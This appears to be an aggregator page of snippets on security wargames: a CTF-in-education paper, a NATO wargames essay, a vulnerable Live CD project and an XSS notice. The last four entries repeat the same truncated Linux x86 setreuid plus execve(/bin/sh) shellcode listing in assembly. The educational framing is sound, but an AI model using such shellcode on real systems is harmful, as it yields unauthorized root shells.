CTF for Education

In this paper, we take a close look at how CTF can be used in cybersecurity education. We divide the CTF competitions into four different categories, which are attack-based CTFs, defense-based CTFs, jeopardy CTFs and gamified and wargames CTFs. We start our analysis by summarizing the main...

Including Hackers in NATO Wargames

This essay makes the point that actual computer hackers would be a useful addition to NATO wargames: The international information security community is filled with smart people who are not in a military structure, many of whom would be excited to pose as independent actors in any upcoming...

[Capture the flag] Remaster Linux Live CD images for wargames

Remaster Linux Live CD images for the purpose of creating ready to use security wargames with pre-installed vulnerabilities to exploit. Requirements You will need the following in order to build the Live CD using the scripts in this project: Linux, with root access using sudo git make, gcc -- for...

Unfixed XSS vulnerability at www.my-wargames-page.net

Security researcher jath, has submitted on 17/09/2009 a cross-site-scripting XSS vulnerability affecting www.my-wargames-page.net, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 19/09/2009. It is...

linux/86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode

No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode. Shellcode exploit for linx86 platform / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, ea...

linux/86 setreuid(geteuid geteuid) + execve(/bin/sh) shellcode

No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...

linux/x86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode

Exploit for linux/x86 platform in category shellcode =============================================================== linux/x86 setreuidgeteuid, geteuid + execve/bin/sh shellcode =============================================================== / setreuidgeteuid, geteuid + execve/bin/sh shellcode -...